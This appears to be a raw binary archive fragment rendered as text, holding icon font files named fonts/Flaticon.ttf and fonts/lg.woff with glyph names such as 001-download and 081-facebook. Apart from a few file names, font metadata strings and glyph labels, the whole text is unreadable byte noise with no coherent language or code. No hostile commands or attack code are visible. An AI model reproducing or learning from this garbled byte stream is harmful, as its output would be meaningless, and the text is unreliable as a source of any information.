2(�}E`��JXK��pD~7�K�����2��z�9�ݷ`AaXȴ��䜁�JJ�s�h��T���S1��zFGzzh��Φ��ty�g����e�W�ں��ƅ��>�{�V/�e����E�ZӤ}A	�]�a�	#k�����˨����Ț8��Ԫ�8��ݗ ��<x�.][Cz��7����>�>���_���񛾶�9� Ω�����񽺩Sr�g�)�ay�1�@x�#�D��椕��vH��Y@m�$��Bԟ�H��J� �T�DX��g����ň"Оc��aI��:��AV�z?H��3(*�3�(�`kw������Ժ�H3�g��s���)�h6��8�(mM���jha6]�`�Y����r���r��sA��w*x�x�-.���G4��T��n�D����4��O����'��@�������+d+o��R�®Q @�,-�d=y�6����(	ǵ�L�R���p)�AT�"2��N�)��z$�HrR;���Oy,�,�>G�"�	=~��x��L�I	]+&wm�����2��"6���#���)}_š��OX,k��A��H��Y7��J���}�gϲ��-G^"7ß�h��R2����9�$�I�B
P��,���������Q�]��R��\�I[LHl6�^������ղ�^G��5q��q��e���[�X��v�%�P=�_��le�d)#Aޕ+ewd����~5�ˀeQ\���*s
�C�^R�Q7o��94�W�|W�ˆt����`9��ű�(�KY˧���y㻚H<
BL2Sg��~w�g�)&�J=n��ۢ���\��T|���xJL�3(]W��r$�@e��!�a1�EmI��Br��2bB
�B(צdX:�dG��y;��/<�@JLݠ�)#u�dR�#���G�8
h��O�nj4��Ck1��_�7#�����fT��Qv�,V?3��\��tu�]S������,�UJ-%��-��OE�(1�Jl/;�i��S�%��3�m��w�EIŨ�S�D$�I
�d�ZP�� Yy�Ucĭ[�蒈)oDF\ᅨ�%�$���$$�O��'HR���ab+�0>����F��������~�%��B��j/���P�")Ũ�-5j�H��v����Ƣ��s��i��,�R�U�!��,7��P��Z���%.:��>bU(-	)����zd�C::|�|�i�K�"�<�`����Oe�����������$]������"�y�9��U;� �xSa��,>�qJH�������SL�}��Ho��m~_���9��4f�L	���U*^��^W����v�~�-30��bn�@HQ8B{x����}<Vۻ�2}EE��O���pq%E&P���>U$��R�"UK���8U��X�U�n�
��RͶ%CQ�[��sEM����s�H��Nu�##�F��DҦ������{����i5Oje<��6��ܶD�s�ϓ��y��>������;w�p��R�;�qavD��e;��tA����,ĝ8�hI0&�̈}����"�#V/^H�I)I�� Ƀ$I0��Ț�U;�K�O� ���--��KK='�C�.>tH���v�S%�ܩ]����%e��of�qb,C#�[G@f)�*������
T����F��"�'�VA�|�N�f�0C�@7�w=0��̐�P��;d�1`��b�eT;x��\��i�ey��F�8|��5��bq�-��%I4���|3M���yZX˦�.����$ޒ�SGȓ��x�]�P��y(=rI1�c���z�k�ě�|��S��:�4��t��R5�Ь$Gc��u��7i�W}�dWE�2G���UW$�-SFw4�r��Ƴ�/Rx<�wL17��i��ɭ~3�X��K3��"���u4N�M��t�c��ŕq6hV�.Ҍ;bp!�y�@����K��� �f9Q� Ť�g�t�r@u�(�z�����˶MHT�$�pg�ޜf���mx��¼U�ּ�y�����3tS�r�(�^��ۣ�PRL�c���0*�\�Dii�1	A�^�- �B�c%�S�V���tgDzi1���%X��fzr�!���+!��)���2�QHOT�vĐb�	�,�\���
�Y�Vȳ^"K��y)��J�J���^�
M��+6�ZA*h�=ݥ���K(��O��tp��?cT�XIHI;�>RL�����/]�H��*1wII�	��=�%�(q|RuX��ҧqFQ�l��_u,u\�W�y�����tlۤ�i�w����bI��B�v���%����F"��D#%�iM�m���5��c�c�|?�s6���k疾�"����u6��~�qY��~�E}%�vuM~�R��Ϧ���"� �~�O�d-o��⢠�W8t�dK����X7E������@3����\��hY�o�^���V���r��Qi��+>铻��i^b���Q&P) �K���>���;I�^Q���#"��o�h����=�Y^F�Jf����P�Jr��Jx��P��OA�U��_Qv׷Q_�ܻ��%U�Z_��+����y�&&;;���N�l����C�-¸���qf�"��=kw�8�E�����,1ڷj�2��b��,���e����
\�O�\��q�ψ|cN�=����:�~Qw��/[��Wr���m�ߚ��ň�Fw�C��cL�5�;�T[���6���6�ODu7�|e�G�W�G
������
��R�e)x��̇�ԫJ�P+p���Yx<.E8�k�(���$�ܯ?.�y|<�$r)��uRΜ��TRJ��7����6��1	b��t<σTO���o��R-��6&}�~��;��/?�B�u�Pxv銮KI��C?�/x�k߸GM�-Y5��� %���3U�Y���{��\��m<
���K����.sSU���G��Z�)�RG�ߝ�{+��|��FL��,�y`d]�p��e����O��"��w1��?�huVk�ժSr�O��(�ɥ�8��v�<����TzJ�N�����b�O�xBŠ��brΐhhI=�o�1<�����z��M�Y��fN��z��|��c��ˣ����f��;�N%��o�X�w���p���ʕ3*����ȋN�f�<��/�'�2�]�W��'ǫg���/.J�l�9�������J�Ηu)�#Kx�o����n�<lQX7���I�V$#�;,�5]�hҼ5��/Ɵ$��߉�

ex&�O/cz��Xl���,��X���؂���}I�?�3[K++��Ҟ���`��'j�&SR"��53�n�����؛>��.��aI|�G{����n��
qv�
xc�(>���gHXu�N�"ς�!���Aaqzɧ���$j7G��ǟ����<
!s<�.u�C6���M�"�eF]\5}zzp`��pR^�[�J��$���n�'F��m)��\��S�K�*Ud��p�3��y���~G@^`����l�������P�9J���Iq͚RF�����+>-�I!I�P�nZ0r�IG\W�ӟ^@/5_fZ��"(k&���{�j��lcD�iu�zi��_�"�A��Q*����._�g|��B�n����7]�}^��, �����vgyלV�d�v�2/S���?��W;mڝ�z�z~��:���<���$4��S�Z>�	�
벅�X��91�{� wQ!�h���I|���ͮ��ԳǸ�
�˖�\ݍ��؏ok%g��2��5����y ��H/b�aq��X��$_,Sď�UTM��=Ll�$nא�bQ�3�xg� #0&���HbOy]'ur��b�I}w?���K�*֠5H!�^*�H�3*e�a�x�X�>�K�sԝ������d(�G�����Z󡰿���q�8h�A$ҋ�X/�c~�����8g�p�;+*�
kk$,ʁ�9�d0d\�M�>�h�8���Nɬ�r�y|/l[�VO�"+o#p���.�C�‰EB���6F��\~
��
�r�����7�@���!sVI�i�.�l���%��9ǝ:����]�>習�1%���i'�3(5�i*���y�Lѐe�'����5�^r
�n�es>��J�\�\���@�����.U�����E(;ML������URJl�BOCY�����-���կ��%235-%�q����K�]�7��n�8Y����Vrh�]6��S�<<nz��'c��y�aۏ#4��1��t4�;4��5��.UJ$L��P*="���YS;��8*�C\x:�
q'�=�q�&�<fbBz�<"�s����c+�3<s������<!����bK��&�Ɔ\�f���1&d��$����Iޙf��8��7(2��(y3��T����!���$��^�X��]m���ܪ]�}o�w$����Ug���-i�<���V�:Aoo�K��]x��M<�o�)��Hcb���	%:�b�c
Z��BV瘴�y�s��b�9i��/d���������tM�)�
�6:~�Ǝ��￷�K��U���j��U\�����T����ck#'"��z?�
,sm��Zl�$gKҟ�Pi���	��W��,
[&��������D�o�^DN��Q�i���ݘ�+1�WN�0�و:�IZf��_��_WD-L�Sx*Z]_P���澢$���sx�O�S}zoQ�P����-��5����GϞUK�����Ypt�sr�*߃*�֩7�+���t��*�V��0�0fm�K�|U��,��T�.L/iںp�*�o��'a�O���/_�IJM������B=4w���#95)gi�i׬��Y�L�˛��^ڏ>��y<i���=��E}�V�eU�ǿ�����si9�ȦT���r{suK�_�#|Z
��s�[�k�5����m�u�t�w�PK�:�yĻ��0����3�f'_�8�ҷ����W��W����1~�YO�y^�fL�_�㙏of�^>�с�V9󷏭��ԙ��x�ǿ�|�w3�=*efʉ�`��2�ѱ��4t�^2��ea-��]��͛��o���X�.#�z�X��+h'(>�k�m����=�;7 �,NS���֞/����u���7ZQn��Tε���Y]�k�$euϾ�;j�[k3�C��,��P��������z�x�^���w����9������_�{���)��
��P#)�I斛cR^ڗ,s��e߉B�ل��L7x2*x9���qx2��ӧ�%|9Q��?��5X�p��`��41��XI�m�4%���|E�i��H�1�M��~�1��S��ffB�����CsH�`B`� ܼ��SŢ
M(
�D��Ƅ�P1�iZg+�� !h���n��_�j��}VZ��I�56�"fҸ�賹"��L}��zS��ז���"�B�"�l��h���$�l���2��]�++[�=�S��'\�.g���eF|��+�����
;_����ش���m����٥6��O��u�w�9��l��=:ʋ���/R�q�6J0��ǩ�C�N����}�s�8�Q����b�6���b��fr���Av�d���]rD�����d?,����8#
�X� �lu���Yo��k(o�,0�lN7W��1H����i��x�	��NAl�{��JEY��x۠�2+���|�|�$��B�nr�g{uzS|~ƚLݿ�D���y�Ȑ�Б�W�:�&�K�U���?
ߜ9e�CQ����s������~de.|��k7�}�-t���z`��Oa�coƴ�+��D��x��γk�^&�/l���2Ń�\w�6�%��M���u�������e���xƚ��Xj��h'=oK>b��HKp���r����5���^��9ޞ�jTA4�(�?#2P:������v �`)��-1^�O��_���YU����g҃I��7�5�-���Jו^��JߨV���Jx籍bfq��2m8�o8��81�����Ur�pf`�7:>~3���W������P���C�m�T�<b`���Y_<�����v�x�!W��j�V��ama��_]xkf���M3_��'zƅ(�)j󘝓�Ƨ�0O�������}"��'Q��ЙYe�ƌ�����ul։&���̿�H��D��7�����x/"�~̃S�#t�0Ax��ܾ��^���b֎˜f���p(��G(w,����e(��c1jov�Ϙ����O�i��h�0�HH�fC�qP�T��ȸ�7>1�/�
�`���Ќ
&�H���.h�F����fA���i�VT����o~C��£�S���3$9�!KcJ�l��QwZd��$MD��Q�͢�뼝�7��`�h� �Pú���)��pV�:����r/�T�0�8k�l^4'��/��9�a���o[��dÍ�W{o�������k^.��{��2�W���S|Ai��kcj�:ja`Р��s��F}v��� >:#.-)-U����e�,�sO�~��FM6�Y����iXu�J��0���4<B�a�E;r�=�^��,s�e|�b�bk�M�ovsݖ�X�5�`����M!M��m*���Sf�E�
����6���&�r������5'�WoC���_�_��`V��@���v��K��"�m� �f�{1?�\wI��2�"S��ث��q�
�(�����&��]��
�xi�u/����Q�T�= ��b/�CGU!��f�J����F�.�� ����ꦭ_��U�T�8f^1Ho���\�K�
9x���$<d&����Y@}��:�M����5@�S�a��־�r��vO :�M?�� �]E<��ډK��� � �o��u3�IP|;S��y�$�t(�B��+� �p�r�b#�u������Y�����HM##^��
-�3���h�G(�F$�Ϗז&���c�1�C.x+�V�|�
�2�!���(X#�H�

x�B	�V� t"v=��*���(�����2��*�@�*d��`��U8��H��o�t�����Y��;����=m��譼���E�w	�{-w�䗣=CRZ?ډ=~
�@c���u�K�t���wj4K�����Ǩ��m.�)��H�Dv���uIي��r��$'���f�ؼʸ�J�� ��$����a�Ӽ��~����o2�[��Y�9�y��E�\z2f�Ԃ���r)����/�GQ���2�lJ(�Ax0ׇ�&mcpoJX?�6*b{��&�i�1��}���uR��:�L����"��^�>��[�i��0��m�w�㾝�xn8\�7m[ �Y\G�/<y���[wҿQ��[�Y��U<٣<�����fBщ�
g;x��
����>P�OL!y(�\��]5Y��@r�n�A���5�Yr�5Y­'`XO�;��"'��HQ.�@:xw>9Ȥ;����5i�9�u�21H�ȡD���W�0��Cv��Iu�GդMz:h�F�O@��+!-��Ac��T������^	LHy 
�H@:R��a�hh�>�j؅����9�,`L�%bv<�Xm~�J����	q�at���.dH#y��T�4�ꅡ����;�wxc�N���i
�"����KrG�~R�	ސ�hQ	���dhɛ��fc����O�
{3MB�m�-^�q$PK�8FZ�`��d�dfonts/Flaticon.ttfnu�[���
�PFFTM�7od�OS/2O�]pX`cmap�C�lJcvt D�gasp��d�glyf�ϳ�hY�head��}�6hhea��$hmtx����loca����maxp��8 name���$^�post�}H(_��
Z�_<��I���I���������.��T�@.��LfGLf��PfEd� �O���.�C ���i��2i@2��@@!����&��0
��0��F*v6��v�0D( �O�� �����D****P~���B"���0d���H�
�l�����"�^<��H��<fx�p�
�>.� . ` � �!.!H!l!�!�"�#�$�%%�&D'�()6)d)�)�)�)�*L*�*�+4+j+�,N,�,��U.�/<��2��<��2�/<��2��<��233'3#�wffU��3(X"/&4?62762��		�	��	>�		�������#"/#"&462"264�{5AVyy�y0_YYY�%y�yyVK:Z~ZZ~���%%2#!"&463"&463!2#2#!"&463��4��4
f
�i����7"/&4?62Ͽ����	��	����
%"'&546�

�g
������*2"'&'#".54622654&"327#"&46264&"j�N0$8P8&4&����].)
04j��O6%%6%��j3
&$(88(&))&]�����Ԗ��%6%%6�����5t��%01#"#&'&'&'&76?6227626/&"#"'*1&'&'&'&'05&7567076/.'&'5&"2327676.>"#"'&'&##"'.'.>�;%*5bH9%(
)0")6;%		3-	%
6C\0%
�
4L	 �
pM
V}�<)
0UDF-#%
)3"�;	%!7

	%'AAP-	
8
	L4
+ a
Mp

}2����3;F2"'.'&'&'&54654&"0167567470&2"&42654.#"��x	1�
HU	zg�g,tt,�lLLlLXT;/*;�xUrh:p0UwIggIg``g�MkMMk�<*/<S1�7"/&4?62762�� \� ��9�!]�!����� %2#".546;27>�`�~K^+B2:,p^K~�`/-91C,i����%"/&4?'&4?62������	��	)W%"/"/&4?62�	��	�j��������7#"'&5#"/'.5&7%�V96;���
�HO�	�uM	�-�@����2"'.54264&"��q&0>

>0&�X??X?�qO(^HK		KH^(O�?X??X���2"&42>54&""/&462�������2U1k�kkew��������1U2Lkk�kCw2����
<E��1:j����.>#"&>&'&#"#"'&?'&7676743>##"/76'.$#"'.76#"#'&?'&'76#"/&?143?'*&#05"#0.".0&'&501505>6765'&?67673217>?'4541&5054'41&5414&4'4541&=&541&505&'&'7#'"1#1#1#10####11121/76.#"#'765/2656765"#"'"#&#'"1#1"1"0#"1""1#0#0/32?/&>767136223762+"4372+"4372+"43�


A		 		%	
.-'F		3;?"NA	O	�	
,A#�u	4(�LJ
&.JcQ
#			��JJ44

5�
c]W`		C81�
>lJ*
]
L	R� 		
	'=%	7:		16	��.
-Hd
�"
?L<
		��++��������������	+"1"0#"1#"=15154&+"=#"=#"=#"=#"=+"/"1&5154222;&=47#""=476;54;5423542354235423232121235#"$4/7'3521110##1+1#1#"&=42;54;57/&676"7"4;2#"4;2#&676"'7"4;2#"4;2#"4;2#"4;2#"&462'"32>54&�		-!	===")	
;*===
"�s�""J(S�	�KD9�	^ii%�	`ii%%ii%k"	R'.M
���3K>32#>>��S44	K��::�
#T	
#F#"	�����.<[����7&767632'&#"#""'&7654&#"&7676326#"'&632'2#"'&'&63264&#"&7676676&7>&'#&76'#+"&764'&6;23>32#"&'#'&'"#"'.>?"32+3264&7'#2+"4;7&'&627120367>54'&6#3'01""10"#"'3'37&�02AE3
/?<--
$G2+!!	%%08P)! &;($4!!%55%
	,,&	
�
8	"C		C"�4	
��3�96�795*	:!&!$&")6%%8��$$�?)*/+&&9z$32G(-P89(
*
%�5K5
->,�

!


		#)	
	
_/	
�G

H(6+	/;*LG?-??3����Ueu����$1>KXe��2+"&=#"&46;5#"&46;5#"&46;5#"&46;546;2+"32+32+32+32+3;264&+1#";13264&+";264&+1#";13264&+""4;2"=4&#+"=46754?#"/46;2376;2354;2+5'##"354#"5'46';7#+"/#+"=54+""&4623264&"6"#"'&'&2#"54=#"#&'&6'#"'&'&6&'&6#"&/#"'&?93531;2131313313"/"'&?'&67�44	

		

		

		

	'    y�}
�
 0 `�
�n#�
�
X	



m;

#"5111551115~hhh|���P
  
yRR�B<�CC��

�!	


�6�21��

@��+;2#!"&=4623!2654&#!""&=463&?'&6#"�&&�&		


�
		&]334		4�&�&&@		@



@		@&��555	
4@��+82#!"&546;2+"3!2654&+"&463676"/�&&�&&@		@



@		�555	
4�&�&&&		
�


		�334		4!����
4l��������
$"&4632&"32>54".5476264&#"&7632'7654'.547542#"'&#""=&'451&1432++"=42354;'32"=#"&?627++"=#"&?623'323547++"=42354;'32"=#"&?62$+"4;6"#"'&75&6#"'2+"43&6#"#'"'&?6:qPP9%?$VeGG3. y.
1E22"!
&)::,	
	
		p3:+!"3�3:3!"+u3:+!"3��,,
x,
�PqP%?%8�GeG!-3�-"22E1:R:@	



	
�6	Y Z$$#	627	��	76$$��d7	�qj�##5.	7rB�4P�q%"&4?!"&463!'&462��p�i

�p��pp�����mrz��������AFK++3232#!"&=46;547546;542+35#"=4;5#32"=#"&=&=#"&?6/3763'&6!'&;535467546;5#"&=&=#+323547546;5#".=&=##2"=4;5#32+35'3135#35+"';5#35+"!!'#"'35'2+35#"=4;5#75#;1'"="&543235.547542#0&'5654'�$

		�2		
44
$�""�'��'�S�\��NFVFN�
8	8
�	8

8	�44;BFFB�BGGB��2�*BG644=GB�	

 
�

�

aZ
��zzk	nn~�
�

�

�

��

�����)���

t*	u"&4?!".5463!'&462Y��
��P��
o���
������MR^it���������%2+"4;26=4&+1#";2+"&=&/&6?6%'.&?6'%'46;7>/$#"'&?#"'&?6"&=46;2#'3541#0+".=46;2#0+3'"135;2=#32+"4"4;2#3"4;2#�

KK

e�
��
K
jj	=	��
U8��	=�
�2C��B
GH.		T		TTTt	B	B	CBD!!Jc!2��

�
qV

R�=
=
�Y
Y�ŷ��t�s�
))*
�				 "	2		2e&��������������++"'&?#;2"/.5422?>=#"'&'&"+"=4>;2767627#"#'#"&?'&637276;'&6;20;232#324'#2464/&+"&;'+32+"#/#3762;27&2"62"62"62">"/&=4767&76=&'&676"/�%	

	=[)%	%%&	..	(&*F2""2F)K+T		
	K
d%/�"L6qI3  3I��$#$�
"!!"	-	
2%+ 	
;EL//))J')@%43
%�
Ro�\��
'11'!{

	3++3	/$$/5	/	7�����01ABUVijz{������2"=7&?67#"/&6%"'&54676#765&546?&6+"56.'&'&6+"5.'&'6&'&6767''&6676767#"/"#&?&'376#"/&?67'&?6;2"5'4+"6'4276264&"6/?�[AA�A@��=3/9k"%!�
24+
!$:

1q0,h/
'!N# F	��|�-.�.
-.s�)�-KK�
%
%"%
%9a
Y5�=#'D+e8"A70
'0#<��			

	s+''#u
		y$�
//�!��6{�m	���5@D`kl���2323232#!"4;54;54632=&/&'&=463&/#"35#7>?!#"354#"&=4754+6765/&?'&6?627'&/76'&7�$.5��5/$ 0y�҄%2��2%��0 �				"

�9-&/LL0%-9��/��=�	8&��&8	##��
$/#!		!%



0����"*3<Xl��%/"#"/#"#&/&?&5462$264&"7&'767'7>6?62/#"'&?'776'&?'&/"&546762654.'&6&"&462�B[[BV4d�d4��X|XX|"O0&H5�5H&0O�


	(

AhJ+#		$>X>
		$*zC��C�2HFddFH2�|XX|X�8�}}�5�


�J4&@6 ,>>,@&4�
����%-5=[_2#!"4;546;23546;2346;2!54+"354+"34+""=/"'&?627#"4;242�

�0

17181��1�1�1Ri%��%c%

<�o,ZZ��>��ZZ��>���9

"j%��%c��
�����6qw���42426"&4664&""#"'&576?6376?#"#&5'#"'&'#"'&'&'&?&'&?'.?637>737'"67&'1&'6757654&#767>�m#



�
			�<52;

|;2G:'q?	�:uK*?,m
�]+,�
:j%�55�19?�##A



�			

�Bu)7F3;}
#;21:�\,�
7(It+,h6.�55z&m
s'=O%"&54>?32654&'#"'&547#'"&54>?32654&'#"'&547#�"FdFW/UB/. 
.j"FdFW/UB/. 
.�#12FF2&K1.	A�/! /
3Ym!u#12FF2&K1.	A�/! /
3Ym!���%2+"&=#"&46;54>23��������������Ihz~2+1"&46327&#"2654'&6"/#"'"'&?&'&46327542&'"&54>327&#"32654&?&#"2654'"642�

&0+
^�^^B;-#;PWzz�zC

7:8DD8:7
C�_XA*Q	)0C/&)'3:R&@&9R�(##3$)��1+$B]]�^($5z�zzW/+			/4_C
8:%$97	
C��;*&

 �)"//"%)"R9&@%Q:)$3##){0����'+c����2+#"/##"'&?#"&546;>2&"34+";54235423542354235423542354232'0"="//"'&?67627#"4;21;3121211424242�})	+D+	)}�$*8��P�!ZH$HS

+�����y		y����'

'3

37

7i

iO

Op

p�

��+

ZH$HS)(���W����"/+"&/&'"/&4?&/.=46?67'&4?626?>;276254&/&'&'&?6/&'&'&/.+"/&?632;26?67676?6/&7676?2>$2"#"'&7>54&"'&'&54#"/&=42&4242�

(



8



(



(



8



(

)	
'
8
'
		
'
8
'

�ц_7#
.<SvS9-

3 !�H8



(



(



8



(



(



a8
'
		
'
8
'
		
'�_C$A.
	M0;SS;/L
*,6Cr72

-M�����B����642$42'2"="&542;2=4+"&=4675422"54+";/&##"'&=4?676354675'&6?676"=4&+"#"/&6676./&36?>.&?36'5#;'37'/6/1'4&767Mk}		��)(/ {?	
18) ,:(%-

_	I
	I_%$1#((/ �?			?d)%=2�-9			lxU
	



					

	

		q9>�5+B-+!2

):-7#
#
O9�H �fgT
)7���570!0���0� 0����� 126"&4632'&#"2654'&7&232+"&=47��Ԗ�jYF9KX}}�}�V

k	54;j��Ԗ7.}�}}X1,2
	�	�	
	���0;E[a��2"=4&+""=4632#!".='&=46354.+3%5#"32=+"='32!5463'35#%54&+"=!"=#"54;2642 42>	z
	�F
(
�
6�
H
�&�44,��(�
H
a���

		

QZ�	

�Y��
66
L�3 

 4�81DS#

##

#Q8

T
��y_gt�������%#"'"/#"&5"&51"&547'#"/&?62?64/&6;7&?6?'&6264&"654&"327664&#""27>4/#"&4?#"/632122264/&476764/&6676'1'&6?'+2?636164242642642�:
!
	
		
				 
:`Y3c!"!-#"e3X��	<"�A%!	
'
Y 				

		 S
15
$,s�&��;
	
	

				!;`Y3b!!
""e3X�&"	I
@!		(X 			
		
	
	+R
6	%}������!56#!"&76;54>3232'354&"!#"&=#"&=#�	�c	'I+#I�%5%~{$;	
		
	;$/

r,#&&�bU"		""		"������"*-5?IM%"'&'&?63!2#'7#'3'7!7673'&2"="'&?"/&642���W6tGHH2t-@?ll�R{��Q;"l?�^$	%w	$����cHIIOHAH����ߠ		ZH�
4

4$$$$�	F����@KNv�642&4242427"32#!"=463546724#.=.=43!2#!1#"!4&'3'7&476=#"4;2>7!;27654'2+""54+"4;263�f>N
��

`
	��
L�XK

.�

�
	��
-

-tt&

=<

<		���5b5Y



Y55Y

Y5�

,�7Y
a77S::S7�

		*����8@\q�/+"/"#"'7676#"1"/&?&546276'&6$264&"#"#'&57'&6?627'&/762'&6#"&4632'.#"3267�B!IG1F89?!BP!a�aL:B8=��WzWWz�'	22	'7
71,,''PK17MM71K!26D0+B<�4�3��<�,6DaaD;[�3��{WW{Wq
(77(
	11	-'',,1BNmMA1.5 /D9+v����7"/&4?62������������"#+,;CDLMU`aop~"&462"&54>326"32>54'"&462"&54>32&"264'&"&462"&462&"3264'"'&6?6#"/.>#�(:((:(E#2'#2
 ,5E(:((:(E#2
 #2',,5�)9))9)"G22G2@, 63
�	���	��9))9)EV2$'2#�, ��9))9)FU2#2$'� ,, �:((:(EU2F22FX,+qq�qq����)%2"&547'#"&46327&54632#"'6�'77M7�/&77&-�7'+7&/��{7M77&P%6N6#Q
&7+'7&Q
Q$���$%2++"&=#"&=46;546;2�����
����@@!%2+53264&+5;#"&46;#"53�5K";#ff!..!f�.!ff5KK5ff!;�@K5#;"1.B.1_B.1KjK1i44��� 2"'&'.54632676x:N9(*((*(9N:*""�T@4':#%""%#:'4@T!!��� D#"'#&'&'&54763267632>54'&#""'&'&#"6�%4 c))c 4%(;A**A;~(&6.2!!2.
1 ""v+<?>&T##T&>?<+,;

;��#!5$-1"".

.""1#'.���''7'77��<��<��<�����<��<��<��6����3#!"&546;7#[n ��  �PP@��  � nuP�����/#"'&?'&6?62�
p!�	!p
�:$:��"b�	LL�b"������#2"&4264&"62"&42"&=4�Ԗ�Ԗ��zz�z�


��Ԗ���z�zz��Z	�


�		���7OW_r��&'&47>762"'"264"'.'&47>762"27>764'.'"&462"264'&47>762"2"/&462762&"2?64&"'oGG./h/.GG./h/�������h0.FF.0h0.FF.0h/.GG./h/.GG.�������������I
	<��I<��OI��<G./h/.GG./h/.Gŀ������F.0h0.FF.0h0.F�G./h/.GG./h/.G�:�����5������I;��I<��h
I��<	���7OW_{��&'&47>762"'"264"'.'&47>762"27>764'.'"&462"264&4?'&462762"/"/"&4?'&462762'264/764&"'&"27oGG./h/.GG./h/�������h0.FF.0h0.FF.0h/.GG./h/.GG.�������������EEEEEEEE�DDDDDDDDeEEEEEEEG./h/.GG./h/.Gŀ������F.0h0.FF.0h0.F�G./h/.GG./h/.G�:�����5������EEEEEEEEDDDDDDDD@EEEEEEE��� !,->NOWXcghptu}��7"/&4?6#3"'&?'&6#"'&?6#!"&5463!2"3!2654&#!!"43!2#%".5462&"2'"&462&"2'"&462&"2'�77//l//77I""�r!!�!�b��r�����
G
�	w/.
)(()
./#	��X"R!!�����Rv(
%%%���'5CGUfr2+32+32#!".4;546;54633234;54#!"67#+"5#3!273'#754#!"32322+"&=46354+";2�l-		^	��		o
�x"	w��	,3	~
 
�	���
�	DM	DD	��+^����	��+�		�U����		�	&Z.9ALW_gr}��2+"43!2+"43#"'&7>7#"'.'&62#"&4264&"$2#"&42654.#"2"&4264&"'2"&46264&#"$2"&4264&#"�		w		D		w		R9U
0E)
T9	=\*%�s*
%		�**%�
*		�**%		/R8(D.	�8R
Y7+8B+8		++8B+V

B++8

�����(08'"/&4?627&67626/&7$64&"'64'�856�<		g				f		47:��fOgg�gg�--''�7�:<6		f			
f		:�89�~ftg�gg�g-�.'o(�����
)7HVdr����7#"'.76326&'&#"327"'&67632&327>'&#"'.7>32#"'3276&'&#"#"'&67632'327>'&#"%#"'&54>7>54&'.5476326763267#"'&67>7>767&'&#"327'327676�


�
	]

	
	B
9�
"CD`75>
	
>57N=6W�4	&!	! 
	4B59G205		e2Y!&

<�09@6<t"
	"
7	�  9

	.V	"
	"C
")]CC%4
	


4%.(?J��3H*!)4:>'**
	

)<p&


�:185>���/:JR7"&546742264&""=.4675422654.#"%"5.5462264&"I&4&&&�
	""(

1&4&S&&H$&&$f		�-&&
%
�		�&2&�		��
(�$��		f$&&H&&{;C�����>3264&"'&5462#"'6&?#2?6+"/&?6;2'3'&+"2+"&=#"'&'&'&476767#+"&=46;23632#"'&'"'62676764'&'&63546354+";26"02741426754&"54+";2�	%+<<V<EbEE1* xl1		5	>	
Vl>�*<=+&

&+%%{�
-.+)&7:*$$*97*79*$&+	-'

&+"#v�S�


�h<V<<+ 	%1EEbE>
:
>>�	0!. .!
		- -- -- -/!"0 .!�������%"/"&4?'&462762���������������v����%"&4?'&462�����

�����t62!2#!"/&47����P��o�
����q%2#!"/&4?62�

�ip��p�p��p�����3###53546;#" ` @`@@8(@ 
P�PP(8P
���'/:2+"&=46354&+";262"&4264&"74>32"&`B^^B�B^^B0B.�.BB.�.B��jKKjK_B//B/�


�^B�B^^B�B^���.BB.�.BBKjKKj�/B//B�


���/#"'327.'327.=3&547&54632676(ItFXII9"5
%0/'q@=+.$"_!5iW6/,) 9&
81:
+>!%����
)*2+".5473#%2#54#"#3>3 4 :4ggd5Ag4%gg����6FE��F&�6-0����>2#"&'&'&?&54763276'&'&#"'.546Ut`I*	
&
&
8[0G%r�gLQp;1H*�4
 !>??M.@G
G$Nn `$%3##5#53533"&4632&#"32>7#�@@ @@ ��^�^^B<,*$(88(%[� @@ @@ B^^�^'08P8���)4;F7'>77&'632.54&732767#"'&7>%&'67&&'>7�`KE1B.&�$<$,C..TE�Ml+1!'49('$&F>c	Q<fUXl:<E�7Y?U�
 !
TC4�c4$f:
<cj&
+XBhgc "1Ja)-HO7+3'32654'&#654'&+32753#327673#"&546323.#"�	
)��:	�M(NM��/�
?9/GA31�i�&
8 
SE�
	S�&&s#
	

"9@<@!t�� #$#"'&'.'547>7>3727'�		"^''�&!	
^'&�%"��}}�:N&!	
	":N&	�HH�����(%.>5462.6?.>'&>�
"(F˔��J
rT$e5Vd��e	
�9o*I�˓FFr&'#	��e�V
	�.$���				H6	�	 �	�FlaticonFlaticonRegularRegularFontForge 2.0 : Flaticon : 31-7-2020FontForge 2.0 : Flaticon : 31-7-2020FlaticonFlaticonVersion 001.000 Version 001.000 FlaticonFlaticon��T	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQ001-download
002-search003-menu004-left-arrow005-play006-icon-121954007-phone-call008-placeholder	009-check010-call011-right-arrow012-up-arrow013-send014-pin015-search-1
016-effort017-task
018-target019-strategy
022-arrows023-arrows-1024-business-and-finance025-trajectory026-business-and-finance-1027-arrowsoutline028-card029-holidays
030-energy	032-award	033-badge034-bars-chart
035-rocket036-left-quote	037-signs038-aim	039-chart	040-clock	041-money
042-interface
043-symbol
044-portfolio045-deal046-business047-precious-stone
048-hourglass051-certificate052-arrows-2	053-share054-files-1055-signs-1056-multimedia057-shapes-and-symbols058-like	059-close060-document061-star062-null
063-null-1
064-null-2
065-null-3
066-tablet067-illustration068-search-2	069-paint
070-adjust
071-vision
072-cancel077-next079-left-arrow-2080-arrow-pointing-to-left081-facebook
082-instagram083-twitter084-linkedin
085-pinterest086-google-plus087-dribble088-behance089-youtube090-refresh��դ'�I���I��PK�8FZ���tt
fonts/lg.woffnu�[���wOFFt(OS/2``cmaph����3ogaspglyf	�	�Z	+�head�66	t�>hhea�$$��hmtxTTJQlocaT,,vXmaxp�  �name������MpostT  ��������3	@����@�@ � ���3�p�����
��
����� ���3�p�������
�����������t���797979V�U#'327654'&#"2#"'&54763*V��eeee��eeee��}}}}��}}}}0VT���ee��eeee��ee}}��}}}}��}}��T��V�U"%27654'&#"2#"'&5476�eeee��eeee��}}}}��}}}}ZUee��eeee��ee}}��}}}}��}}����U�U(=!2#!"'&547633!#!"'&5476%!"3!27654'&#��5%&&%5�U5&%%&5�
$!!)�U5%&��U

�

U%&5�V5&%%&5�5&%���
%&%5�)!!j
�V

�
��*�''7'77*��<��<��<�����<��<��<��UU�"2!2#!#"'&54763�
��

�g�

��

*

�

�

*

+UU�"2#"'&54?!"'&54763!'&54763U
*

��
�g

����
��

�

��+V+
